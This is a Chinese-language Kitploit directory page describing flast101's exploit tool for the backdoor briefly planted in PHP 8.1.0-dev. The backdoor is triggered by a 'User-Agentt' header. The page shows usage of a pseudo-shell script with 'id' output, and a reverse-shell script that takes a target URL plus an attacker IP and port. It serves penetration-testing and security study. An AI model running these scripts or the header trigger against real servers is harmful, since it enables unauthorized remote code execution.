Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
php-8.1.0-dev-backdoor-rce — PHP 8.1.0-dev Backdoor System Shell Script | Kitploit
工具/GitHubGitHub/flast101/php-8.1.0-dev-backdoor-rce
ExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubflast101/php-8.1.0-dev-backdoor-rce

php-8.1.0-dev-backdoor-rce

PHP 8.1.0-dev Backdoor System Shell Script

查看仓库
94215年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PHP 8.1.0-dev 后门远程代码执行

PHP 8.1.0-dev 后门系统 Shell 脚本

docs/logo_php81.png

PHP 8.1.0-dev 版本于 2021 年 3 月 28 日发布时内置了一个后门,但该后门很快被发现并移除。如果服务器运行此版本的 PHP,攻击者可通过发送 User-Agentt 头来执行任意代码。

问题被发现后,原始代码已被恢复,但随后又遭到第二次篡改。该入侵会在任何运行了被篡改版本 PHP 的网站上创建后门,使黑客能够在站点上执行远程代码。

阅读完整文章:https://flast101.github.io/php-8.1.0-dev-backdoor-rce/


POC 脚本

这份简短的漏洞利用脚本 backdoor_php_8.1.0-dev.py 利用该后门在主机上提供一个伪系统 Shell。可在 Exploit DB 上找到它。

  • 漏洞利用标题: PHP 8.1.0-dev 后门远程代码执行
  • 日期: 2021 年 5 月 23 日
  • 漏洞利用作者: flast101
  • 厂商主页: https://www.php.net/
  • 软件链接: https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
  • 测试版本: 8.1.0-dev
  • CVE : N/A
  • 漏洞参考:
    https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
    https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

用法:

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
  
Enter the host url:
http://a.b.c.d

Interactive shell is opened on http://a.b.c.d 
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

反弹 Shell

这份简短的漏洞利用脚本 revshell_php_8.1.0-dev.py 可在目标上提供反弹 Shell。

用法:

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

docs/revshell-script.png

保持好奇,学习就是生活! 😃

下载工具